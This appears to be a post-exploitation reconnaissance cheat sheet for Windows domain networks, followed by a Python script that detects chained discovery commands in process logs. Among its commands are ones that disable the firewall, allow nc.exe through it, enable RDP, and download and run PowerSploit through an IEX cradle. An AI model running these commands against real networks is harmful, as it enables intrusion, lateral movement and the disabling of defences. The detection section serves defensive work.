
Internal Network Information Gathering

Collecting Local Host Information

Manual information gathering

Query network configuration

ipconfig /all

Query operating system and software information

Query operating system and version

systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

(The findstr strings must match the field labels of the system's display language; on a non-English Windows the labels are localized.)

Query system architecture

echo %PROCESSOR_ARCHITECTURE%

View installed software, versions and paths

wmic product get name, version

powershell "Get-WmiObject -Class Win32_Product | Select-Object -Property Name, Version"

Query local services

wmic service list brief

Query the process list

tasklist

wmic process list brief

View startup programs

wmic startup get command, caption

View scheduled tasks

schtasks /query /fo LIST /v

View host boot time

net statistics workstation

Query the user list

net user

net localgroup administrators

Query online users

query user || qwinsta

List or disconnect sessions between the local computer and the clients connected to it

net session

Query the port list

netstat -ano

View the patch list

systeminfo

wmic qfe get Caption, Description, HotfixID, InstalledOn

Query the local share list

net share

wmic share get name,path,status

Query the routing table and the ARP cache of all available interfaces

route print

arp -a

Query firewall configuration

Turn off the firewall

Windows Server 2003 and earlier

netsh firewall set opmode disable

Later than Windows Server 2003

netsh advfirewall set allprofiles state off

Modify the firewall configuration

Windows Server 2003 and earlier

netsh firewall add allowedprogram c:\nc.exe "allow nc" enable

Later than Windows Server 2003

netsh advfirewall firewall add rule name="pass nc" dir=in action=allow program="C:\nc.exe"

Allow the specified program to make outbound connections

netsh advfirewall firewall add rule name="Allow nc" dir=out action=allow program="C:\nc.exe"

Allow inbound connections on port 3389

netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

Set a custom location for the firewall log

netsh advfirewall set currentprofile logging filename "C:\windows\temp\fw.log"

View proxy settings

reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings"

Query and enable remote connection services

Check the remote connection port

reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /V PortNumber

The value 0xd3d is 3389 in decimal.

Enable port 3389 on Windows Server 2003

wmic path win32_terminalservicesetting where (__CLASS!="") call setallowtsconnections 1

Enable port 3389 on Windows Server 2008 and Windows Server 2012

wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS!="") call setallowtsconnections 1

wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName="RDP-Tcp") call setuserauthenticationrequired 1

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f

Automated information collection

Host information gathering with Empire

View local users, domain members, password set time, clipboard contents, basic system information, network adapter information and share information

usemodule situational_awareness/host/winenum

usemodule situational_awareness/host/computerdetails

Query current privileges

whoami

Three cases:

Local regular user

Local administrator user

Domain user

Get the domain SID

whoami /all

Query detailed information for a specified user

net user XXX /domain

Determine whether a domain exists

Using the ipconfig command

ipconfig /all

View detailed system information

systeminfo

Query the current logon domain and user information

net config workstation

Identify the primary domain

net time /domain

[screenshot: output of net time /domain when the current user is a domain user]

After running the command there are three possible outcomes:

A domain exists but the current user is not a domain user: a system error is returned.

A domain exists and the current user is a domain user: the command succeeds, as shown in the screenshot above.

The current network environment is a workgroup: the domain controller cannot be found.

Discovering Live Hosts on the Internal Network

Quick discovery with NetBIOS

nbtscan.exe 192.168.1.0/20

Quick discovery with ICMP

for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.1.%I | findstr "TTL="

Discovery by ARP scanning

arp-scan tool

arp.exe -t 192.168.1.0/20

ARPscan module in Empire

usemodule situational_awareness/network/arpscan

Invoke-ARPScan.ps1 script in Nishang

powershell.exe -exec bypass -Command "& {Import-Module C:\windows\temp\Invoke-ARPScan.ps1; Invoke-ARPScan -CIDR 192.168.1.0/24}" >> C:\Windows\temp\log.txt

Scanning Internal Network Ports

Metasploit port scan

auxiliary/scanner/portscan/tcp

PowerSploit's Invoke-Portscan.ps1 script

powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Invoke-Portscan.ps1'); Invoke-Portscan -Hosts 192.168.1.0/24 -T 4 -ports '445,1433,8080,3389,80' -oA c:\windows\temp\rex.txt"

Nishang's Invoke-PortScan module

Invoke-PortScan -StartAddress 192.168.250.1 -EndAddress 192.168.250.255 -ResolveHost

Port banner information

Collecting Basic Domain Information

Query domains

net view /domain

Query all computers in a domain

net view /domain:HACKE

Query the list of all user groups in the domain

net group /domain

Query the list of all member computers in the domain

net group "domain computers" /domain

Query domain password policy information

net accounts /domain

Get domain trust information

nltest /domain_trusts

Finding Domain Controllers

View the domain controllers' machine names

nltest /DCLIST:DomainName

View the domain controllers' host names

nslookup -type=SRV _ldap._tcp.

View the current time

net time /domain

View the Domain Controllers group

net group "Domain Controllers" /domain

netdom query pdc

Getting Domain User and Administrator Information

Query the list of all domain users

Query the domain controller

net user /domain

Get detailed information on domain users

wmic useraccount get /all

View existing users

dsquery user

Query local Administrators group users

net localgroup administrators

Query domain administrator users

net group "domain admins" /domain

Query enterprise administrator users

net group "Enterprise Admins" /domain

Locating Domain Administrators

Common tools

psloggedon.exe

psloggedon.exe \\DC

PVEFindADUser.exe

PVEFindADUser.exe -current

netview.exe

nmap scripts

smb-enum-sessions.nse: collects information from the domain controller; can obtain host information, users and more

smb-enum-users.nse: for the case where access to a host has been obtained but no further domain user information is available

smb-enum-shares.nse: enumerates the shared directories of a remote host

smb-enum-process.nse: enumerates the processes of a remote host

smb-os-discovery: information about the host's operating system, computer name, domain name, forest name, NetBIOS machine name, workgroup, system time, etc.

PowerView scripts

Invoke-StealthUserHunter

Invoke-UserHunter

Empire's user_hunter module

usemodule situational_awareness/network/powerview/user_hunter

Finding Domain Admin Processes

Local check

Get the domain administrator list

net group "Domain Admins" /domain

List all local processes and their owning users

tasklist /v

Query domain user sessions on the domain controller

https://github.com/nullbind/Other-Projects/tree/master/GDA

Query tasks running on remote systems

First, collect the domain administrator list from the Domain Admins group.

Then add the target IPs to ips.txt and the collected domain administrator list to names.txt.

FOR /F %i in (ips.txt) DO @echo [+] %i && @tasklist /V /S %i /U user /P password 2>NUL > output.txt && FOR /F %n in (names.txt) DO @type output.txt | findstr %n > NUL && echo [!] %n was found running a process on %i && pause

Scan remote systems' NetBIOS information

First, collect the domain administrator list from the Domain Admins group.

Then add the target IPs to ips.txt and the collected domain administrator list to admins.txt.

for /F %i in (ips.txt) do @echo [+] Checking %i && nbtstat -A %i 2>NUL > nbsessions.txt && FOR /F %n in (admins.txt) DO @type nbsessions.txt | findstr /I %n > NUL && echo [!] %n was found logged into %i

BloodHound tool

brew services start neo4j

Collection scripts (ingestors)

https://github.com/BloodHoundAD/BloodHound/tree/master/Ingestors

SharpHound.exe -c all
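Added example, not from the original post or from any tool it names: the commands catalogued above are exactly what a SOC hunts for in process-creation telemetry, so this script maps them into discovery buckets (local enumeration, domain enumeration, live-host sweeps, RDP/firewall tampering) and flags any host/user pair that spans three or more buckets within ten minutes. The record layout, the bucket regexes and the sample events are constructed assumptions, not a vendor's log schema.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Buckets of discovery commands taken from the cheat sheet above (patterns are constructed).
DISCOVERY = {
    "local_enum": re.compile(r"\b(systeminfo|ipconfig /all|tasklist|net user\s*$|"
                             r"net localgroup administrators|wmic qfe)", re.I),
    "domain_enum": re.compile(r"\b(net (group|user|view|time|accounts) .*/domain|"
                              r"nltest /(dclist|domain_trusts)|dsquery user|netdom query)", re.I),
    "host_sweep": re.compile(r"\b(nbtscan|ping -w 1 -n 1|Invoke-ARPScan|Invoke-Portscan|arp\.exe -t)", re.I),
    "rdp_fw_tamper": re.compile(r"\b(netsh (adv)?firewall .*(state off|opmode disable)|"
                                r"fSingleSessionPerUser|setallowtsconnections)", re.I),
}
LINE = re.compile(r"^(\S+) host=(\S+) user=(\S+) cmd=(.*)$")  # assumed record layout (constructed)

def classify(cmd):
    """Set of discovery buckets a command line falls into (empty for everything else)."""
    return {name for name, rx in DISCOVERY.items() if rx.search(cmd)}

def hunt(lines, window=timedelta(minutes=10), min_buckets=3):
    """Flag (host, user) pairs that cover >= min_buckets distinct buckets within any window."""
    by_actor = defaultdict(list)
    for m in filter(None, map(LINE.match, lines)):
        ts, host, user, cmd = m.groups()
        if buckets := classify(cmd):
            by_actor[(host, user)].append((datetime.fromisoformat(ts), buckets))
    hits = {}
    for actor, evs in by_actor.items():
        evs.sort(key=lambda e: e[0])
        for i, (start, _) in enumerate(evs):          # slide a window starting at each event
            seen = set()
            for ts, b in evs[i:]:
                if ts - start > window:
                    break
                seen |= b
            if len(seen) >= min_buckets:
                hits[actor] = sorted(seen)
                break
    return hits

# Constructed sample: alice chains four commands in eight minutes; the other two never fire.
SAMPLE = """\
2020-02-10T10:41:14 host=WS01 user=CORP\\alice cmd=ipconfig /all
2020-02-10T10:44:25 host=WS01 user=CORP\\alice cmd=net group "domain admins" /domain
2020-02-10T10:46:48 host=WS01 user=CORP\\alice cmd=nltest /dclist:corp
2020-02-10T10:49:02 host=WS01 user=CORP\\alice cmd=nbtscan.exe 192.168.1.0/24
2020-02-10T11:30:00 host=SRV02 user=CORP\\svc_backup cmd=systeminfo
2020-02-10T14:05:11 host=WS07 user=CORP\\bob cmd=netsh advfirewall set allprofiles state off
""".splitlines()
```

A lone systeminfo from a service account or a single firewall change by an administrator stays below the threshold; only the chained enumeration pattern is raised.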
